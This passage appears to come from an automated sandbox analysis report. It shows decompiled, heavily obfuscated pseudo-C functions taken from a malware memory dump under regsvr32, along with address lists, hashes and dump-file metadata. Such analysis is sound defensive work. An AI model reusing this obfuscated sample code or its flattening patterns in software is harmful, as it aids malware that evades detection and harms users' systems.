				_v576 = 0x1cf321;
				_v576 = _v576 + 0xffffc0e0;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 << 7;
				_v576 = _v576 ^ 0x000d9bab;
				_v532 = 0x45ea0d;
				_v532 = _v532 / _t251;
				_v532 = _v532 ^ 0x000fbf52;
				_v540 = 0x89573e;
				_v540 = _v540 + 0xffffd980;
				_v540 = _v540 ^ 0x008ac7ea;
				do {
					while(_t217 != 0x2095a83) {
						if(_t217 == 0x3550051) {
							_t217 = 0xca1b903;
							continue;
						} else {
							if(_t217 == 0xba5f136) {
								_t210 = E04B409DD(_v560,  &_v524, _v584, _v592);
								 *_t210 = 0;
								_t217 = 0x2095a83;
								continue;
							} else {
								_t260 = _t217 - 0xca1b903;
								if(_t217 == 0xca1b903) {
									_push(_v556);
									_push(_v548);
									_push(_v564);
									_t211 = E04B4E1F8(0x4b31000, _v528, _t260);
									_t224 =  *0x4b56214; // 0x0
									_t213 =  *0x4b56214; // 0x0
									E04B52D0A(_v572, _t260, _t213 + 0x23c, _v536, _v596, _v588, _t224 + 0x34,  &_v524, _t224 + 0x34, _t211);
									_t210 = E04B4FECB(_t211, _v600, _v604, _v544, _v580);
									_t254 =  &(_t254[0xe]);
									_t217 = 0xba5f136;
									continue;
								}
							}
						}
						goto L9;
					}
					L04B4437A(E04B4BEFD, _v552, _v576, _v532, _v540, 0,  &_v524,  &_v524);
					_t254 =  &(_t254[6]);
					_t217 = 0x9325c58;
					L9:
					__eflags = _t217 - 0x9325c58;
				} while (__eflags != 0);
				return _t210;
			}

0x04b44f74
0x04b44f7a
0x04b44f84
0x04b44f8c
0x04b44f91
0x04b44f99
0x04b44fa1
0x04b44fa6
0x04b44fae
0x04b44fb6
0x04b44fbe
0x04b44fc6
0x04b44fce
0x04b44fe0
0x04b44fe5
0x04b44feb
0x04b44ff0
0x04b44ff8
0x04b45004
0x04b45009
0x04b4500f
0x04b45014
0x04b4501c
0x04b45029
0x04b4502c
0x04b45030
0x04b45035
0x04b4503d
0x04b45045
0x04b4504d
0x04b45055
0x04b4505d
0x04b4506d
0x04b45071
0x04b45079
0x04b45081
0x04b4508d
0x04b45090
0x04b45094
0x04b45099
0x04b450a1
0x04b450a9
0x04b450b1
0x04b450b9
0x04b450c3
0x04b450c7
0x04b450cf
0x04b450d7
0x04b450dc
0x04b450e6
0x04b450ea
0x04b450f2
0x04b450fa
0x04b45102
0x04b4510a
0x04b45112
0x04b4511a
0x04b4511f
0x04b45127
0x04b4512f
0x04b45139
0x04b45151
0x04b45156
0x04b4515c
0x04b45169
0x04b45171
0x04b45179
0x04b45181
0x04b45189
0x04b45191
0x04b45199
0x04b451a1
0x04b451a9
0x04b451b1
0x04b451b9
0x04b451c6
0x04b451c7
0x04b451cb
0x04b451d3
0x04b451db
0x04b451e3
0x04b451eb
0x04b451f0
0x04b451f5
0x04b451fd
0x04b4520b
0x04b4520f
0x04b45217
0x04b4521f
0x04b45227
0x04b4522f
0x04b4522f
0x04b4523d
0x04b452f2
0x00000000
0x04b45243
0x04b45249
0x04b452df
0x04b452e8
0x04b452eb
0x00000000
0x04b4524f
0x04b4524f
0x04b45251
0x04b45257
0x04b45260
0x04b45264
0x04b4526c
0x04b45271
0x04b45293
0x04b452a6
0x04b452bd
0x04b452c2
0x04b452c5
0x00000000
0x04b452c5
0x04b45251
0x04b45249
0x00000000
0x04b4523d
0x04b45316
0x04b4531b
0x04b4531e
0x04b45320
0x04b45320
0x04b45320
0x04b45332

Strings

X\2, xrefs: 04B45164
E, xrefs: 04B451FD

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: E$X\2
API String ID: 0-703089088
Opcode ID: e84051855dadc671867642ab83a7b8625438a152e7f0d9e217ae24d4c4569a66
Instruction ID: 20a218e1c1fa2a0b9d436a1ad5217a2a3867cb8451dcaa8c7678eee1b29b9503
Opcode Fuzzy Hash: e84051855dadc671867642ab83a7b8625438a152e7f0d9e217ae24d4c4569a66
Instruction Fuzzy Hash: 4D9132711083809FC768CF25D88A91BBBE1FBC4398F504A1DF29696260D3B1DA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 04B3DE74, Relevance: 2.7, Strings: 2, Instructions: 193
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04B3DE74() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t162;
				intOrPtr _t166;
				intOrPtr _t168;
				void* _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr _t196;
				void* _t201;
				char _t202;
				signed int* _t203;
				void* _t205;

				_t203 =  &_v92;
				_v48 = 0x569f20;
				_v48 = _v48 * 0x6b;
				_t169 = 0;
				_v48 = _v48 ^ 0x2435b753;
				_t201 = 0xa773912;
				_v36 = 0xa39ca1;
				_v36 = _v36 + 0xffff508a;
				_v36 = _v36 ^ 0x00aa5884;
				_v84 = 0x943e6a;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 + 0x5d77;
				_t171 = 0x78;
				_v84 = _v84 * 0xe;
				_v84 = _v84 ^ 0x0005cfbb;
				_v72 = 0x1e0d0a;
				_v72 = _v72 | 0x4cfb6fde;
				_v72 = _v72 + 0xffff94ff;
				_v72 = _v72 ^ 0x4cfa3edf;
				_v80 = 0xa086f6;
				_v80 = _v80 << 0x10;
				_v80 = _v80 >> 5;
				_v80 = _v80 + 0xffff18d5;
				_v80 = _v80 ^ 0x0432d7e2;
				_v68 = 0xb8dd27;
				_v68 = _v68 | 0xebb7bfbf;
				_v68 = _v68 ^ 0xebb8c1a9;
				_v32 = 0x418b74;
				_v32 = _v32 * 0x7e;
				_v32 = _v32 ^ 0x2049f6fa;
				_v64 = 0x577cf5;
				_v64 = _v64 * 0x64;
				_v64 = _v64 / _t171;
				_v64 = _v64 ^ 0x004a237d;
				_v76 = 0x4c7ee;
				_v76 = _v76 ^ 0x14a6b669;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x4a231390;
				_v44 = 0xd26523;
				_v44 = _v44 | 0x7504cc1f;
				_v44 = _v44 ^ 0x75d3d950;
				_v88 = 0x7e3e67;
				_v88 = _v88 >> 5;
				_v88 = _v88 + 0xfffffc49;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x000c6abf;
				_v40 = 0x647ef6;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00028bbb;
				_v92 = 0x531e5a;
				_v92 = _v92 << 8;
				_v92 = _v92 | 0xbedf5cfb;
				_v92 = _v92 ^ 0xffdbb821;
				_v52 = 0xaf5b7e;
				_v52 = _v52 ^ 0x54b2eb64;
				_v52 = _v52 >> 3;
				_v52 = _v52 ^ 0x0a8e907d;
				_v56 = 0x7e69cb;
				_t172 = 0x76;
				_v56 = _v56 / _t172;
				_v56 = _v56 + 0xffff7440;
				_v56 = _v56 ^ 0x00047804;
				_v60 = 0x4d1deb;
				_v60 = _v60 | 0x7db56f6d;
				_v60 = _v60 + 0xffff2308;
				_v60 = _v60 ^ 0x7dffdcf4;
				_t200 = _v28;
				_t202 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t205 = _t201 - 0xa773912;
						if(_t205 > 0) {
							break;
						}
						if(_t205 == 0) {
							_t201 = 0xa19a195;
							continue;
						}
						if(_t201 == 0x6df88bf) {
							E04B354B6(_v52, _v56, _v60, _t200);
							L25:
							return _t169;
						}
						if(_t201 == 0x82168a7) {
							L04B52B09(_v88, _v24, _v40, _v92);
							_t201 = 0x6df88bf;
							continue;
						}
						if(_t201 == 0x88022e2) {
							_t196 =  *0x4b56214; // 0x0
							E04B4E0F2(_v8 + 1, _t196 + 0x23c, _v76, _v44, _v12);
							_t162 =  *0x4b56214; // 0x0
							_t203 =  &(_t203[3]);
							_t169 = 1;
							_t201 = 0x82168a7;
							 *((intOrPtr*)(_t162 + 0x24)) = _v16;
							continue;
						}
						if(_t201 != 0xa19a195) {
							goto L22;
						} else {
							_t202 = L04B3C307();
							_t201 = 0xf928839;
							continue;
						}
					}
					if(_t201 == 0xbfd8a94) {
						if(E04B3E640(_v32, _v64,  &_v24,  &_v16) == 0) {
							_t201 = 0x82168a7;
							goto L22;
						}
						_t201 = 0x88022e2;
						goto L1;
					}
					if(_t201 == 0xeffcd22) {
						_t201 = 0x6df88bf;
						if(_v28 > 2) {
							_t166 = E04B4F840( *((intOrPtr*)(_t200 + 8)), _v80,  &_v20, _v68);
							_v24 = _t166;
							if(_t166 != 0) {
								_t201 = 0xbfd8a94;
							}
						}
						goto L1;
					}
					if(_t201 != 0xf928839) {
						goto L22;
					}
					_t168 = E04B48C7D(_t202, _v36,  &_v28, _v84, _v72);
					_t200 = _t168;
					_t203 =  &(_t203[3]);
					if(_t168 == 0) {
						goto L25;
					}
					_t201 = 0xeffcd22;
					goto L1;
					L22:
				} while (_t201 != 0x8019399);
				goto L25;
			}

0x04b3de74
0x04b3de77
0x04b3de8a
0x04b3de8e
0x04b3de90
0x04b3de98
0x04b3de9d
0x04b3dea5
0x04b3dead
0x04b3deb5
0x04b3debd
0x04b3dec2
0x04b3ded1
0x04b3ded4
0x04b3ded8
0x04b3dee0
0x04b3dee8
0x04b3def0
0x04b3def8
0x04b3df00
0x04b3df08
0x04b3df0d
0x04b3df12
0x04b3df1a
0x04b3df22
0x04b3df2a
0x04b3df32
0x04b3df3a
0x04b3df47
0x04b3df4b
0x04b3df53
0x04b3df60
0x04b3df6c
0x04b3df70
0x04b3df78
0x04b3df80
0x04b3df88
0x04b3df8d
0x04b3df95
0x04b3df9d
0x04b3dfa5
0x04b3dfad
0x04b3dfb5
0x04b3dfba
0x04b3dfc2
0x04b3dfc7
0x04b3dfcf
0x04b3dfd7
0x04b3dfdc
0x04b3dfe4
0x04b3dfec
0x04b3dff1
0x04b3dff9
0x04b3e001
0x04b3e009
0x04b3e011
0x04b3e016
0x04b3e01e
0x04b3e02a
0x04b3e02d
0x04b3e031
0x04b3e039
0x04b3e041
0x04b3e049
0x04b3e051
0x04b3e059
0x04b3e061
0x04b3e065
0x04b3e065
0x04b3e069
0x04b3e069
0x04b3e069
0x04b3e069
0x04b3e06f
0x00000000
0x00000000
0x04b3e075
0x04b3e116
0x00000000
0x04b3e116
0x04b3e081
0x04b3e1f3
0x04b3e1fd
0x04b3e203
0x04b3e203
0x04b3e08d
0x04b3e105
0x04b3e10c
0x00000000
0x04b3e10c
0x04b3e095
0x04b3e0c1
0x04b3e0d4
0x04b3e0d9
0x04b3e0e4
0x04b3e0e7
0x04b3e0e8
0x04b3e0ed
0x00000000
0x04b3e0ed
0x04b3e09d
0x00000000
0x04b3e0a3
0x04b3e0ac
0x04b3e0ae
0x00000000
0x04b3e0ae
0x04b3e09d
0x04b3e126
0x04b3e1c7
0x04b3e1d3
0x00000000
0x04b3e1d3
0x04b3e1c9
0x00000000
0x04b3e1c9
0x04b3e132
0x04b3e174
0x04b3e179
0x04b3e18f
0x04b3e194
0x04b3e19c
0x04b3e1a2
0x04b3e1a2
0x04b3e19c
0x00000000
0x04b3e179
0x04b3e13a
0x00000000
0x00000000
0x04b3e153
0x04b3e158
0x04b3e15a
0x04b3e15f
0x00000000
0x00000000
0x04b3e165
0x00000000
0x04b3e1d8
0x04b3e1d8
0x00000000

Strings

}#J, xrefs: 04B3DF70
g>~, xrefs: 04B3DFAD

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g>~$}#J
API String ID: 0-4030106083
Opcode ID: 86d3ff7ddf133b1aa6db4704175159660117460321bcae45573118695eecd0c6
Instruction ID: f0113f8a5f6431a70f3934c905668611a76acb2fe613a81eda9094583e3bc5e9
Opcode Fuzzy Hash: 86d3ff7ddf133b1aa6db4704175159660117460321bcae45573118695eecd0c6
Instruction Fuzzy Hash: 719165718083419FC758CF66C48541BFBE1FB84359F504A6EF89A97260D3B5EA09CF86

Uniqueness

Uniqueness Score: -1.00%

Function 04B3E7DE, Relevance: 2.7, Strings: 2, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B3E7DE(void* __ecx, void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				void* _t159;
				signed int _t180;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				void* _t194;
				signed int* _t212;
				signed int* _t215;

				_t212 = _a8;
				_push(_a12);
				_t211 = _a4;
				_push(_t212);
				_push(_a4);
				_push(__ecx);
				E04B4FE29(_t159);
				_v88 = 0xa74a92;
				_t215 =  &(( &_v128)[5]);
				_v88 = _v88 + 0x6289;
				_v88 = _v88 ^ 0x00a7ad1b;
				_t194 = 0x98d5ac6;
				_v72 = 0xabb696;
				_v72 = _v72 + 0xffffe542;
				_v72 = _v72 ^ 0x00a9fc0a;
				_v120 = 0x8dd565;
				_v120 = _v120 + 0xffff1d47;
				_v120 = _v120 + 0x56a1;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x46a17a82;
				_v124 = 0x8aacb4;
				_t189 = 0x6e;
				_v124 = _v124 / _t189;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x000ba54e;
				_v76 = 0x9f90a6;
				_v76 = _v76 | 0x682faec6;
				_v76 = _v76 ^ 0x68b53021;
				_v80 = 0xfbe8ab;
				_v80 = _v80 << 0xc;
				_v80 = _v80 ^ 0xbe8fb9cd;
				_v84 = 0x1efa1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x0009eae4;
				_v92 = 0xb2d03c;
				_v92 = _v92 ^ 0x8bcf93b7;
				_v92 = _v92 ^ 0x8b76d684;
				_v100 = 0x2cdd15;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x00bdfcd6;
				_v104 = 0x2a00e4;
				_v104 = _v104 | 0x603c2e46;
				_v104 = _v104 + 0xffff11ee;
				_v104 = _v104 ^ 0x6032c829;
				_v128 = 0xd0d9f9;
				_v128 = _v128 + 0x4e1d;
				_t190 = 0x14;
				_v128 = _v128 * 0x58;
				_v128 = _v128 / _t190;
				_v128 = _v128 ^ 0x0398a77e;
				_v68 = 0x2cfb4c;
				_t191 = 0x67;
				_v68 = _v68 / _t191;
				_v68 = _v68 ^ 0x000f6b94;
				_v112 = 0x1ddb62;
				_v112 = _v112 + 0x6002;
				_v112 = _v112 << 2;
				_v112 = _v112 + 0xe88d;
				_v112 = _v112 ^ 0x0072622d;
				_v116 = 0x4c27f5;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 | 0x0ee4ea1c;
				_v116 = _v116 * 0x4e;
				_v116 = _v116 ^ 0x89b93018;
				_v108 = 0x73a5e7;
				_v108 = _v108 * 0x7d;
				_v108 = _v108 >> 1;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x3c03dbf2;
				_v64 = 0x20f8;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 ^ 0x0009aa09;
				_v96 = 0x5991b1;
				_v96 = _v96 | 0x807a0890;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0x03d0ebbf;
				do {
					while(_t194 != 0x8b4e35) {
						if(_t194 == 0x2701dd5) {
							L04B4CAD5(_v68, _v112, __eflags, _v116, _t211,  &_v60);
							_t215 =  &(_t215[3]);
							_t194 = 0x8b4e35;
							continue;
						} else {
							if(_t194 == 0x3d33b80) {
								_push(_t194);
								_push(_t194);
								_t180 = E04B3C5D8(_t212[1]);
								_t215 =  &(_t215[3]);
								 *_t212 = _t180;
								__eflags = _t180;
								if(__eflags != 0) {
									_t194 = 0x48381f5;
									continue;
								}
							} else {
								if(_t194 == 0x48381f5) {
									L04B322A6(_t212, _v80,  &_v60, _v84);
									_t215 =  &(_t215[2]);
									_t194 = 0xae51dd8;
									continue;
								} else {
									if(_t194 == 0x62374bf) {
										_t212[1] = L04B45333(_t211);
										_t194 = 0x3d33b80;
										continue;
									} else {
										if(_t194 == 0x98d5ac6) {
											_t194 = 0x62374bf;
											 *_t212 =  *_t212 & 0x00000000;
											_t212[1] = _v88;
											continue;
										} else {
											if(_t194 != 0xae51dd8) {
												goto L16;
											} else {
												L04B40A90(_v92, _v100, _v104,  &_v60, _v128,  *((intOrPtr*)(_t211 + 0x20)));
												_t215 =  &(_t215[4]);
												_t194 = 0x2701dd5;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					L04B4CAD5(_v108, _v64, __eflags, _v96, _t211 + 0x18,  &_v60);
					_t215 =  &(_t215[3]);
					_t194 = 0x462b9b2;
					L16:
					__eflags = _t194 - 0x462b9b2;
				} while (__eflags != 0);
				L17:
				__eflags =  *_t212;
				_t158 =  *_t212 != 0;
				__eflags = _t158;
				return 0 | _t158;
			}

0x04b3e7e7
0x04b3e7ef
0x04b3e7f6
0x04b3e7fd
0x04b3e7fe
0x04b3e800
0x04b3e801
0x04b3e806
0x04b3e80e
0x04b3e811
0x04b3e81b
0x04b3e823
0x04b3e828
0x04b3e830
0x04b3e838
0x04b3e840
0x04b3e848
0x04b3e850
0x04b3e858
0x04b3e85d
0x04b3e865
0x04b3e873
0x04b3e878
0x04b3e87e
0x04b3e883
0x04b3e887
0x04b3e88f
0x04b3e897
0x04b3e89f
0x04b3e8a7
0x04b3e8af
0x04b3e8b4
0x04b3e8bc
0x04b3e8c4
0x04b3e8c9
0x04b3e8d1
0x04b3e8d9
0x04b3e8e1
0x04b3e8e9
0x04b3e8f9
0x04b3e8fe
0x04b3e906
0x04b3e90e
0x04b3e916
0x04b3e91e
0x04b3e926
0x04b3e92e
0x04b3e93b
0x04b3e93e
0x04b3e94a
0x04b3e94e
0x04b3e956
0x04b3e962
0x04b3e965
0x04b3e969
0x04b3e971
0x04b3e979
0x04b3e981
0x04b3e986
0x04b3e98e
0x04b3e996
0x04b3e99e
0x04b3e9a8
0x04b3e9ba
0x04b3e9be
0x04b3e9c6
0x04b3e9d3
0x04b3e9d7
0x04b3e9db
0x04b3e9e0
0x04b3e9e8
0x04b3e9f0
0x04b3e9f5
0x04b3e9fd
0x04b3ea05
0x04b3ea0d
0x04b3ea12
0x04b3ea1a
0x04b3ea1a
0x04b3ea2c
0x04b3eb00
0x04b3eb05
0x04b3eb08
0x00000000
0x04b3ea32
0x04b3ea38
0x04b3ead4
0x04b3ead5
0x04b3ead9
0x04b3eade
0x04b3eae1
0x04b3eae3
0x04b3eae5
0x04b3eae7
0x00000000
0x04b3eae7
0x04b3ea3e
0x04b3ea40
0x04b3eab2
0x04b3eab7
0x04b3eaba
0x00000000
0x04b3ea42
0x04b3ea44
0x04b3ea96
0x04b3ea99
0x00000000
0x04b3ea46
0x04b3ea4c
0x04b3ea85
0x04b3ea87
0x04b3ea8a
0x00000000
0x04b3ea4e
0x04b3ea54
0x00000000
0x04b3ea5a
0x04b3ea72
0x04b3ea77
0x04b3ea7a
0x00000000
0x04b3ea7a
0x04b3ea54
0x04b3ea4c
0x04b3ea44
0x04b3ea40
0x04b3ea38
0x00000000
0x04b3ea2c
0x04b3eb27
0x04b3eb2c
0x04b3eb2f
0x04b3eb34
0x04b3eb34
0x04b3eb34
0x04b3eb40
0x04b3eb42
0x04b3eb47
0x04b3eb47
0x04b3eb51

Strings

F.<`, xrefs: 04B3E90E
-br, xrefs: 04B3E98E

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -br$F.<`
API String ID: 0-3678315648
Opcode ID: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction ID: c8ec71333618ca89de9f071e1ce798765016d4417d8b9fb1bda27911be8105cc
Opcode Fuzzy Hash: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction Fuzzy Hash: 949121715083419FD358CF65D98991BBBE1FBD4748F00891EF68696260E3B1EA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 04B4654A, Relevance: 2.7, Strings: 2, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E04B4654A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _v88;
				char* _v92;
				char* _v96;
				signed int _v100;
				char _v104;
				char _v624;
				char _v1144;
				void* _t168;
				signed int _t200;
				signed int _t204;
				signed int _t205;
				signed int _t206;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t168);
				_v48 = 0xcd00f6;
				_v48 = _v48 + 0xcd83;
				_v48 = _v48 ^ 0x09b3856c;
				_v48 = _v48 ^ 0x097e4b14;
				_v68 = 0x47ecc1;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x0000069b;
				_v56 = 0x5623e4;
				_t204 = 0x5e;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x07a7b883;
				_v60 = 0x9f93bd;
				_v60 = _v60 ^ 0x1b2b58cc;
				_v60 = _v60 ^ 0x1bb3b428;
				_v36 = 0x1947a4;
				_v36 = _v36 | 0x7bdfb0e1;
				_v36 = _v36 ^ 0x7bdfc232;
				_v52 = 0x76ccb;
				_v52 = _v52 * 0x2b;
				_v52 = _v52 ^ 0x7f6a3668;
				_v52 = _v52 ^ 0x7e52560e;
				_v24 = 0x419396;
				_v24 = _v24 / _t204;
				_t205 = 0x46;
				_v24 = _v24 * 0x57;
				_v24 = _v24 ^ 0x845af85c;
				_v24 = _v24 ^ 0x84646483;
				_v16 = 0xd7b9b6;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x000408e3;
				_v44 = 0x89b89f;
				_v44 = _v44 * 0x1b;
				_v44 = _v44 / _t205;
				_v44 = _v44 ^ 0x00329adc;
				_v40 = 0x7c911;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0x9fb7bc96;
				_v40 = _v40 ^ 0x9fbb58de;
				_v32 = 0x2960c2;
				_v32 = _v32 >> 0xd;
				_t206 = 0x3b;
				_v32 = _v32 * 0x6a;
				_v32 = _v32 ^ 0x000737d7;
				_v8 = 0x50758c;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 / _t206;
				_v8 = _v8 + 0xffffa1a5;
				_v8 = _v8 ^ 0x002c6c3d;
				_v72 = 0xae2241;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x0004039d;
				_v28 = 0x59a91e;
				_v28 = _v28 * 0x35;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 + 0x675a;
				_v28 = _v28 ^ 0x00026f30;
				_v64 = 0xf7748e;
				_v64 = _v64 * 0x37;
				_v64 = _v64 ^ 0x3526d747;
				_v20 = 0x936b67;
				_v20 = _v20 + 0xffff21a6;
				_v20 = _v20 + 0x6733;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x0025db68;
				_v12 = 0x60291e;
				_v12 = _v12 + 0xffffd016;
				_v12 = _v12 << 9;
				_v12 = _v12 + 0xffff2f3b;
				_v12 = _v12 ^ 0xbff2968b;
				E04B4FE2A(_v60, _v36, 0x1e,  &_v104);
				E04B4FE2A(_v52, _v24, 0x208,  &_v624);
				E04B4FE2A(_v16, _v44, 0x208,  &_v1144);
				L04B3E204(_v40, _v32,  &_v624, _a4);
				L04B3E204(_v8, _v72,  &_v1144, _a12);
				_v100 = _v48;
				_v96 =  &_v624;
				_v92 =  &_v1144;
				_v88 = _v56 | _v68 | 0x00000410;
				_t200 = E04B3E4F8( &_v104, _v28, _v64, _v20, _v12);
				asm("sbb eax, eax");
				return  ~_t200 + 1;
			}

0x04b46554
0x04b46557
0x04b4655a
0x04b4655d
0x04b4655e
0x04b4655f
0x04b46564
0x04b4656d
0x04b46574
0x04b4657b
0x04b46582
0x04b46589
0x04b4658d
0x04b46594
0x04b465a1
0x04b465a4
0x04b465a7
0x04b465ab
0x04b465b2
0x04b465b9
0x04b465c0
0x04b465c7
0x04b465ce
0x04b465d5
0x04b465dc
0x04b465e7
0x04b465ea
0x04b465f1
0x04b465f8
0x04b46606
0x04b4660d
0x04b46610
0x04b46613
0x04b4661a
0x04b46621
0x04b46628
0x04b4662c
0x04b46630
0x04b46634
0x04b4663b
0x04b46646
0x04b46650
0x04b46653
0x04b4665a
0x04b46661
0x04b46665
0x04b4666c
0x04b46673
0x04b4667a
0x04b46682
0x04b46683
0x04b46686
0x04b4668d
0x04b46698
0x04b466a0
0x04b466a3
0x04b466aa
0x04b466b1
0x04b466b8
0x04b466bc
0x04b466c3
0x04b466ce
0x04b466d1
0x04b466d5
0x04b466dc
0x04b466e3
0x04b466ee
0x04b466f4
0x04b466fb
0x04b46702
0x04b46709
0x04b46710
0x04b46714
0x04b4671b
0x04b46722
0x04b46729
0x04b4672d
0x04b46734
0x04b46744
0x04b4675c
0x04b4676f
0x04b46784
0x04b46799
0x04b467a4
0x04b467ad
0x04b467b6
0x04b467ca
0x04b467d4
0x04b467de
0x04b467e5

Strings

#V, xrefs: 04B46594
=l,, xrefs: 04B466AA

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =l,$#V
API String ID: 0-882995766
Opcode ID: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction ID: 004ede6676938ac641126ca28395096208b9f56f651420e791a63df1b534e2d4
Opcode Fuzzy Hash: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction Fuzzy Hash: 1E81F0B1D0120DEBCF08CFA1D98A8EEBBB5FF48308F208159E515BA250D7B45A49DF94

Uniqueness

Uniqueness Score: -1.00%

Function 04B407F4, Relevance: 2.6, Strings: 2, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04B407F4() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _t88;
				intOrPtr _t89;
				void* _t96;
				signed int _t101;
				signed int _t112;
				short* _t113;
				signed int* _t116;

				_t116 =  &_v552;
				_v548 = 0x5918d1;
				_v548 = _v548 + 0xe8d9;
				_t96 = 0x413edd5;
				_v548 = _v548 * 7;
				_v548 = _v548 | 0xf342c850;
				_v548 = _v548 ^ 0xf3753354;
				_v544 = 0x3961e1;
				_t112 = 0x6c;
				_v544 = _v544 * 0x6e;
				_v544 = _v544 * 0x7b;
				_v544 = _v544 ^ 0xd8b8e625;
				_v528 = 0xb40301;
				_v528 = _v528 ^ 0x18f013f2;
				_v528 = _v528 + 0xffff1b00;
				_v528 = _v528 ^ 0x184a596c;
				_v532 = 0x9ab5ff;
				_v532 = _v532 + 0x870f;
				_v532 = _v532 + 0xffff8f3e;
				_v532 = _v532 ^ 0x0099ca27;
				_v524 = 0x5ab638;
				_v524 = _v524 + 0xffff3304;
				_v524 = _v524 ^ 0x005bd322;
				_v536 = 0x9f91e6;
				_t113 = _v524;
				_v536 = _v536 / _t112;
				_v536 = _v536 >> 2;
				_v536 = _v536 ^ 0x000cbfb4;
				_v540 = 0xcf5411;
				_t88 = _v540 * 0x37;
				_v540 = _t88;
				_v540 = _v540 ^ 0x69295e57;
				_v540 = _v540 ^ 0x45a0f7a2;
				L1:
				while(_t96 != 0x413edd5) {
					if(_t96 == 0x66ebf40) {
						_t88 = E04B50DB1(_v548,  &_v520, __eflags, _v544, _t96, _v528);
						_t116 =  &(_t116[3]);
						_t96 = 0xe87ba20;
						continue;
					}
